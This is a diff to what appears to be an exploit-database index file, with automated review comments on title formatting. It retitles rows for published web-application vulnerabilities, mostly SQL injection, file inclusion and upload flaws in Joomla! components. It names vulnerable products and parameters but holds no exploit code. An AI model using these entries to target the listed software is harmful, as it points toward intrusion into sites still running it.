12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-18,cr4wl3r,php,webapps,0
@ -22991,7 +22992,7 @@ id,file,description,date,author,platform,type,port
12333,platforms/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,php,webapps,0
12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0
12340,platforms/php/webapps/12340.txt,"Joomla! Component 'com_caddy' - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
12340,platforms/php/webapps/12340.txt,"Joomla! Component com_caddy - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0
12345,platforms/php/webapps/12345.txt,"phpGreetCards 3.7 - Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0
12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injection",2010-04-22,v3n0m,php,webapps,0
12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,php,webapps,0
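Review bot: 12340 is touched only to drop the quotes, leaving the title as "com_caddy - Exploit", which does not state a vulnerability class. Every other row in this hunk names one (SQL Injection, OS Command Injection, Cross-Site Scripting); since the line is being edited anyway, replace "Exploit" with the class described in 12340.txt.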
@ -23045,7 +23046,7 @@ id,file,description,date,author,platform,type,port
12428,platforms/php/webapps/12428.txt,"Joomla! Component SmartSite 1.0.0 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12429,platforms/php/webapps/12429.pl,"Joomla! Component ABC 1.1.7 - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
12430,platforms/php/webapps/12430.txt,"Joomla! Component Graphics 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
12432,platforms/php/webapps/12432.txt,"Joomla! Component com_jesectionfinder - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0
12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0
12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0
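Review bot: 12432 becomes "com_jesectionfinder - Arbitrary File Upload", but the commit message shows the other 'com_jesectionfinder' entry in this same commit being renamed to "JExtensions Property Finder - 'sf_id' Parameter SQL Injection". One component ends up under two different names in the index; pick one form and use it for both rows.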
@ -23170,7 +23171,7 @@ id,file,description,date,author,platform,type,port
12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0
12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0
12615,platforms/php/webapps/12615.txt,"Joomla! Component 'com_camp' - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
12615,platforms/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0
12618,platforms/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0
12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0
@ -23181,13 +23182,13 @@ id,file,description,date,author,platform,type,port
12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0
12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0
12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,php,webapps,0
12632,platforms/php/webapps/12632.txt,"Joomla! Component 'com_crowdsource' - SQL Injection",2010-05-17,ByEge,php,webapps,0
12633,platforms/php/webapps/12633.txt,"Joomla! Component 'com_event' - Multiple Vulnerabilities",2010-05-17,ALTBTA,php,webapps,0
12632,platforms/php/webapps/12632.txt,"Joomla! Component com_crowdsource - SQL Injection",2010-05-17,ByEge,php,webapps,0
12633,platforms/php/webapps/12633.txt,"Joomla! Component com_event - Multiple Vulnerabilities",2010-05-17,ALTBTA,php,webapps,0
12634,platforms/php/webapps/12634.txt,"PHP Gamepage - SQL Injection",2010-05-17,v4lc0m87,php,webapps,0
12635,platforms/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection",2010-05-17,Ma3sTr0-Dz,php,webapps,0
12636,platforms/php/webapps/12636.txt,"MidiCart PHP/ASP - Arbitrary File Upload",2010-05-17,DigitALL,php,webapps,0
12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection / Local File Inclusion / Cross-Site Scripting",2010-05-17,mr_me,php,webapps,0
12639,platforms/php/webapps/12639.txt,"Joomla! Component 'com_event' - SQL Injection",2010-05-17,anonymous,php,webapps,0
12639,platforms/php/webapps/12639.txt,"Joomla! Component com_event - SQL Injection",2010-05-17,anonymous,php,webapps,0
12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 - Cross-Site Request Forgery",2010-05-17,"John Leitch",windows,webapps,0
12641,platforms/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,php,webapps,0
12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path",2010-05-18,cp77fk4r,php,webapps,0
@ -23196,7 +23197,7 @@ id,file,description,date,author,platform,type,port
12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0
12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0
12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0
12648,platforms/php/webapps/12648.txt,"Joomla! Component 'com_packages' - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
12648,platforms/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - (sukaCMS) Local File Disclosure",2010-05-18,vir0e5,php,webapps,0
12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0
12656,platforms/php/webapps/12656.txt,"Battle Scrypt - Arbitrary File Upload",2010-05-19,DigitALL,php,webapps,0
@ -23289,7 +23290,7 @@ id,file,description,date,author,platform,type,port
12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car 1.0 - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
12781,platforms/php/webapps/12781.txt,"Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12781,platforms/php/webapps/12781.txt,"Joomla! Component JE Poll - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12782,platforms/php/webapps/12782.txt,"Joomla! Component JE Job 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0
12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0
@ -23323,8 +23324,8 @@ id,file,description,date,author,platform,type,port
12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,asp,webapps,0
12842,platforms/php/webapps/12842.txt,"Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12843,platforms/php/webapps/12843.txt,"Joomla! Component 'com_chronocontact' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12842,platforms/php/webapps/12842.txt,"Joomla! Component ChronoConnectivity - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12843,platforms/php/webapps/12843.txt,"Joomla! Component ChronoForms - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12845,platforms/php/webapps/12845.txt,"Vastal I-Tech - SQL Injection",2010-06-02,HELLBOY,php,webapps,0
12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,php,webapps,0
12849,platforms/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0
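Review bot: rows 12842 and 12843 are retitled from 'com_chronoconnectivity' and 'com_chronocontact' to "ChronoConnectivity" and "ChronoForms", so neither title contains the com_ identifier any more. For 12843 the product name shares no substring with the old identifier, so anyone matching installed component directory names against this column will no longer find the row. Suggest keeping the identifier alongside the product name in the title, or confirming that the referenced .txt files still contain it for full-text search.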
@ -23337,7 +23338,7 @@ id,file,description,date,author,platform,type,port
12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor - (PHPsetimon) Remote File Inclusion / Local File Inclusion",2010-06-03,eidelweiss,php,webapps,0
12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0
12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0
12868,platforms/php/webapps/12868.txt,"Joomla! Component 'com_lead' - SQL Injection",2010-06-03,ByEge,php,webapps,0
12868,platforms/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0
30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 - links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
@ -23380,21 +23381,21 @@ id,file,description,date,author,platform,type,port
14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,php,webapps,0
13790,platforms/asp/webapps/13790.txt,"iClone - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0
14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
13792,platforms/php/webapps/13792.txt,"Joomla! Component 'com_cinema' - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
13792,platforms/php/webapps/13792.txt,"Joomla! Component cinema - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps,0
13794,platforms/multiple/webapps/13794.txt,"Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0
27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,php,webapps,0
27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
13796,platforms/php/webapps/13796.txt,"Joomla! Component 'com_jstore' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13797,platforms/php/webapps/13797.txt,"Joomla! Component 'com_jtickets' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13798,platforms/php/webapps/13798.txt,"Joomla! Component 'com_jcommunity' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13799,platforms/php/webapps/13799.txt,"Joomla! Component 'com_jmarket' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13800,platforms/php/webapps/13800.txt,"Joomla! Component 'com_jsubscription' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13796,platforms/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13797,platforms/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13798,platforms/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13799,platforms/php/webapps/13799.txt,"Joomla! Component com_jmarket - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13800,platforms/php/webapps/13800.txt,"Joomla! Component com_jsubscription - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13803,platforms/php/webapps/13803.txt,"PHPAccess - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13804,platforms/php/webapps/13804.txt,"Joomla! Component 'com_jnewsletter' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13804,platforms/php/webapps/13804.txt,"Joomla! Component com_jnewsletter - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0
13810,platforms/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,php,webapps,0
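Review bot: row 13792 ends up as the bare lowercase "cinema", which is neither the com_cinema identifier nor a product name with a version. The other six rows changed in this hunk (13796 to 13800 and 13804) keep their com_ prefix and lose only the quotes. Suggest "com_cinema" here for consistency. The context row 13794 also still uses the quoted form ('Jreservation'), if the goal is to drop quotes throughout.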
@ -23461,7 +23462,7 @@ id,file,description,date,author,platform,type,port
13912,platforms/php/webapps/13912.txt,"Havij 1.10 - Persistent Cross-Site Scripting",2010-06-17,hexon,php,webapps,0
13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0
13918,platforms/multiple/webapps/13918.txt,"Spring Framework - Arbitrary code Execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0
13922,platforms/php/webapps/13922.txt,"Joomla! Component 'com_joomdocs' - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
13922,platforms/php/webapps/13922.txt,"Joomla! Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
13923,platforms/php/webapps/13923.txt,"Joomla! Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13925,platforms/php/webapps/13925.txt,"Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13926,platforms/php/webapps/13926.txt,"Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
@ -23484,8 +23485,8 @@ id,file,description,date,author,platform,type,port
13951,platforms/php/webapps/13951.txt,"Joomla! Component 'com_eportfolio' - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0
13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS - 'news.php' SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0
13954,platforms/php/webapps/13954.txt,"G.CMS Generator - SQL Injection",2010-06-21,Sid3^effects,php,webapps,0
13955,platforms/php/webapps/13955.txt,"Joomla! Component 'com_community' - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
13956,platforms/php/webapps/13956.txt,"Joomla! Component 'com_jomestate' - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
13955,platforms/php/webapps/13955.txt,"Joomla! Component com_community - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
13956,platforms/php/webapps/13956.txt,"Joomla! Component com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
13957,platforms/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,ALTBTA,php,webapps,0
14363,platforms/php/webapps/14363.txt,"Ad Network Script - Persistent Cross-Site Scripting",2010-07-14,Sid3^effects,php,webapps,0
14359,platforms/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0
@ -23556,7 +23557,7 @@ id,file,description,date,author,platform,type,port
14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,php,webapps,0
14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,php,webapps,0
14062,platforms/php/webapps/14062.txt,"Joomla! Component 'jeeventcalendar' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14063,platforms/php/webapps/14063.txt,"Joomla! Component 'com_jejob' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14063,platforms/php/webapps/14063.txt,"Joomla! Component com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14064,platforms/php/webapps/14064.txt,"Joomla! Component jesectionfinder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0
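Review bot: after the change to row 14063, three adjacent rows with the same author and date use three different conventions: 14062 stays quoted ('jeeventcalendar'), 14063 becomes com_jejob, and 14064 is the bare jesectionfinder. Row 12432 in this same change is titled com_jesectionfinder, so that component is now spelled two ways in the file. Suggest choosing one form for these components and applying it to 14062 and 14064 in the same commit.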
@ -23598,7 +23599,7 @@ id,file,description,date,author,platform,type,port
14149,platforms/asp/webapps/14149.txt,"Setiran CMS - Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps,0
14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - 'post.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - 'forumdisplay.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
14154,platforms/php/webapps/14154.txt,"Joomla! Component 'com_dateconverter' 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
14154,platforms/php/webapps/14154.txt,"Joomla! Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
14155,platforms/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps,0
14209,platforms/php/webapps/14209.txt,"Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0
14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0
@ -23632,7 +23633,7 @@ id,file,description,date,author,platform,type,port
14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla! Component 'com_phocagallery' - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla! Component Phoca Gallery 2.7.3 - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla! Component Address Book - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14211,platforms/php/webapps/14211.txt,"Joomla! Component NinjaMonials - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14213,platforms/php/webapps/14213.txt,"Joomla! Component 'com_sef' - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
@ -23648,7 +23649,7 @@ id,file,description,date,author,platform,type,port
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - 'articlesdetails.php' SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
33410,platforms/php/webapps/33410.txt,"Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection",2009-12-16,"Justin C. Klein Keane",php,webapps,0
14232,platforms/php/webapps/14232.txt,"Joomla! Component 'com_jpodium' - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
14232,platforms/php/webapps/14232.txt,"Joomla! Component JPodium 2.7.3 - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
14233,platforms/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web Application Vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0
14238,platforms/php/webapps/14238.txt,"BS Auction - SQL Injection",2010-07-06,"Easy Laster",php,webapps,0
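Review bot: the new title for row 14232, "JPodium 2.7.3", carries the same version string that row 14207 receives as "Phoca Gallery 2.7.3" elsewhere in this change, and neither old title had a version. Two different components gaining an identical version number looks like a copy-and-paste carry-over. Please check the version against platforms/php/webapps/14232.txt before merging, since a wrong version in the title misleads anyone triaging by affected release.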
@ -23681,7 +23682,7 @@ id,file,description,date,author,platform,type,port
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,php,webapps,0
14293,platforms/php/webapps/14293.txt,"Joomla! Component 'Minify4Joomla' - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0
14291,platforms/php/webapps/14291.txt,"Joomla! Component 'IXXO Cart' - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0
14434,platforms/php/webapps/14434.txt,"Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
14434,platforms/php/webapps/14434.txt,"Joomla! Component com_jomtube - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
14312,platforms/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection",2010-07-10,v3n0m,php,webapps,0
14296,platforms/php/webapps/14296.txt,"Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0
14316,platforms/php/webapps/14316.pl,"PHP-Nuke 8.0 -Web_Links Module - Blind SQL Injection",2010-07-10,yawn,php,webapps,0
@ -23689,8 +23690,8 @@ id,file,description,date,author,platform,type,port
14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0
14308,platforms/php/webapps/14308.txt,"WordPress Plugin Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0
14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80
14313,platforms/php/webapps/14313.txt,"Joomla! Component 'com_myhome' - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
14315,platforms/php/webapps/14315.txt,"Joomla! Component 'com_mysms' - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
14313,platforms/php/webapps/14313.txt,"Joomla! Component MyHome - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
14315,platforms/php/webapps/14315.txt,"Joomla! Component MySMS - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
14335,platforms/php/webapps/14335.txt,"Joomla! Component 'healthstats' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution",2010-07-10,yawn,php,webapps,0
@ -23764,7 +23765,7 @@ id,file,description,date,author,platform,type,port
14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0
14448,platforms/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14450,platforms/php/webapps/14450.txt,"Joomla! Component 'com_iproperty' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 - faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0
@ -23773,7 +23774,7 @@ id,file,description,date,author,platform,type,port
14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent Cross-Site Scripting",2010-07-24,K053,php,webapps,0
14461,platforms/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps,0
14462,platforms/php/webapps/14462.txt,"Joomla! Component Ozio Gallery - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0
14463,platforms/php/webapps/14463.txt,"Joomla! Component 'com_itarmory' - SQL Injection",2010-07-24,Craw,php,webapps,0
14463,platforms/php/webapps/14463.txt,"Joomla! Component com_itarmory - SQL Injection",2010-07-24,Craw,php,webapps,0
14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0
14466,platforms/php/webapps/14466.txt,"Joomla! Component Joomdle 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
14467,platforms/php/webapps/14467.txt,"Joomla! Component YouTube 1.5 - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0
@ -23812,7 +23813,7 @@ id,file,description,date,author,platform,type,port
14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0
14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
14570,platforms/php/webapps/14570.txt,"Joomla! Component 'com_neorecruit' 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
14570,platforms/php/webapps/14570.txt,"Joomla! Component NeoRecruit 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0
14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0
14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0
